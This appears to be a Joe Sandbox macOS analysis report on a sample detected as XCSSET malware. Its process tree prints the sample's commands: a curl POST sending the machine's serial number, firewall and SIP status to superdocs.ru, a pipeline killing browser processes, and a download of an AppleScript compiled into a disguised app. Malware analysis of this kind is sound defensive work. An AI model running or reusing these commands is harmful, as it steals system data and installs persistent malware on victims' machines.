bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -k -s --connect-timeout 14 -d 'MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l

curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -k -s --connect-timeout 14 -d MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l

sh New Fork (PID: 1068, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ps aux | grep -E 'com.apple.net|com.utils.core|com.metal.core|agentde|canaryde|operade|speedde|edegede|firefoxde|yandexde|avatarde|bravede' | grep -v grep | awk '{print $2}' | xargs kill -9

bash New Fork (PID: 1069, Parent: 1068)

ps (MD5: 48b7f71ab3866eee46d3ef67f8233168) Arguments: ps aux

bash New Fork (PID: 1070, Parent: 1068)

grep (MD5: 99be09a23ac46af2879dc015993ca389) Arguments: grep -E com.apple.net|com.utils.core|com.metal.core|agentde|canaryde|operade|speedde|edegede|firefoxde|yandexde|avatarde|bravede

bash New Fork (PID: 1071, Parent: 1068)

grep (MD5: 99be09a23ac46af2879dc015993ca389) Arguments: grep -v grep

bash New Fork (PID: 1072, Parent: 1068)

awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk {print $2}

bash New Fork (PID: 1073, Parent: 1068)

xargs (MD5: 8f884810645d2a6e0b1a4d499993857c) Arguments: xargs kill -9

sh New Fork (PID: 1074, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c echo 'superdocs.ru' > ~/Library/Caches/GitServices/.domain

sh New Fork (PID: 1075, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ioreg -c IOPlatformExpertDevice -d 2 | awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'

bash New Fork (PID: 1076, Parent: 1075)

ioreg (MD5: d03e2df1848ceb731ba4a8c3e82b2011) Arguments: ioreg -c IOPlatformExpertDevice -d 2

bash New Fork (PID: 1077, Parent: 1075)

awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk -F' /IOPlatformSerialNumber/{print $(NF-1)}

sh New Fork (PID: 1078, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -k -s --connect-timeout 14 -d 'updated .domain with superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l

curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -k -s --connect-timeout 14 -d updated .domain with superdocs.ru -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l

sh New Fork (PID: 1079, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c echo ~/Library/Caches/GitServices/.rep

sh New Fork (PID: 1080, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c date -r '/Users/pedro/Library/Caches/GitServices/.rep' +'%s' || echo 9999999999

bash New Fork (PID: 1081, Parent: 1080)

date (MD5: 9983eb16b31b7224ae79b51b2b49ee75) Arguments: date -r /Users/pedro/Library/Caches/GitServices/.rep +%s

sh New Fork (PID: 1082, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c date +'%s'

date (MD5: 9983eb16b31b7224ae79b51b2b49ee75) Arguments: date +%s

sh New Fork (PID: 1083, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c [ -d /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/ ] && echo '1' || echo '0'

sh New Fork (PID: 1084, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/'

mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/

sh New Fork (PID: 1085, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/remove_old.applescript | osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sound.app'

bash New Fork (PID: 1086, Parent: 1085)

curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -sk -d user=pedro https://superdocs.ru/agent/scripts/remove_old.applescript

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
exec.2430808	EXT_SUSP_OBFUSC_macOS_RootHelper_Obfuscated	Yara for the public tool \'roothelper\'. Used by XCSSET (https://gist.github.com/NullArray/f39b026b9e0d19f1e17390a244d679ec)	im0prtp3	0x3f78:$a1: E: neither argv[0] nor $_ works. 0x3f99:$c1: %s%s%s: %s\x0A 0x3f60:$c2: x%lx 0x3f65:$c3: =%lu %d 0x3f6d:$c4: %lu %d%c 0x36b1:$opcodes_3: E8 9A FD FF FF 8B 85 E8 FD FF FF 2B 85 D0 FD FF FF 83 C0 01 89 85 EC FD FF FF E9 0A 00 00 00

Dropped Files

Source	Rule	Description	Author	Strings
/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a	JoeSecurity_XCSSET	Yara detected XCSSET	Joe Security

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: /usr/bin/curl (PID: 979)	Writes from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 982)	Writes from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1034)	Writes from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1043)	Writes from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1067)	Writes from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1078)	Writes from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 1086)	Writes from socket in process: data	Jump to behavior

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49348
Source: unknown	Network traffic detected: HTTP traffic on port 49351 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49345
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49344
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49342
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49341
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49340
Source: unknown	Network traffic detected: HTTP traffic on port 49336 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49339 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49342 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49339
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49338
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49337
Source: unknown	Network traffic detected: HTTP traffic on port 49327 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49336
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49335
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49334
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49333
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49332
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49331
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49330
Source: unknown	Network traffic detected: HTTP traffic on port 49319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49333 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49354 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49347 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49329
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49328
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49327
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49325
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49324
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49323
Source: unknown	Network traffic detected: HTTP traffic on port 49324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49322
Source: unknown	Network traffic detected: HTTP traffic on port 49330 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49321
Source: unknown	Network traffic detected: HTTP traffic on port 49301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49320
Source: unknown	Network traffic detected: HTTP traffic on port 49318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49357 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49338 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49321 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49344 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49319
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49318
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49317
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49315
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49314
Source: unknown	Network traffic detected: HTTP traffic on port 49352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49313
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49312
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49311
Source: unknown	Network traffic detected: HTTP traffic on port 49304 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49310
Source: unknown	Network traffic detected: HTTP traffic on port 49335 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49341 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49310 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49307 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49309
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49308
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49307
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49306
Source: unknown	Network traffic detected: HTTP traffic on port 49349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49305
Source: unknown	Network traffic detected: HTTP traffic on port 49326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49304
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49303
Source: unknown	Network traffic detected: HTTP traffic on port 49303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49301
Source: unknown	Network traffic detected: HTTP traffic on port 49332 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49355 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49306 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49329 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49358 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49309 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49343 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49334 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49353 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49358
Source: unknown	Network traffic detected: HTTP traffic on port 49325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49357
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49356
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49355
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49354
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49353
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49351
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49350
Source: unknown	Network traffic detected: HTTP traffic on port 49331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49328 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49349

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 24 Aug 2022 09:18:41 GMTContent-Type: text/htmlContent-Length: 162Connection: close

Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmp	String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: applet, 00001023.00000508.1.0000000113511000.0000000113cdb000.r--.sdmp	String found in binary or memory: http://www.apple.com/Copyright
Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmp, CodeResources.469.dr, com.apple.spx.plist.495.dr, Info.plist.468.dr, Info.plist.475.dr, sh-thd-4984109211.494.dr	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmp	String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: a.537.dr	String found in binary or memory: https://superdocs.ru/l
Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmp	String found in binary or memory: https://www.apple.com/appleca/0

Source: unknown

HTTP traffic detected: POST /apple/com.php HTTP/1.1Host: superdocs.ruUser-Agent: curl/7.79.1Accept: */*Content-Length: 51Content-Type: application/x-www-form-urlencoded

Source: /usr/bin/curl (PID: 979)	Reads from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: 982)	Reads from socket in process: data	Jump to behavior
Source: /usr/bin/curl (PID: <

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

macOS Analysis Report
exec.2430808

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Dropped Files

Snort Signatures

Joe Sandbox Signatures

Networking

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

macOS Analysis Report exec.2430808

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Dropped Files

Snort Signatures

Joe Sandbox Signatures

Networking

macOS Analysis Report
exec.2430808